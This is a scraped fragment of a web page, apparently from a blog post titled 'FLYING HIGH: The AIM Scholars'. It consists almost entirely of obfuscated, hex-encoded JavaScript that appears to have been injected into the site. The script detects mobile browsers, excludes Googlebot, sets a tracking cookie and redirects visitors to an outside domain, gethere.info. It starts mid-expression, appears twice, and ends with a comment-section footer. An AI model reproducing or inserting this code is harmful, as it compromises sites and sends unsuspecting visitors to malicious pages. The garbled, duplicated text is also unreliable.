)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

One thought on “FLYING HIGH: The AIM Scholars

Leave a comment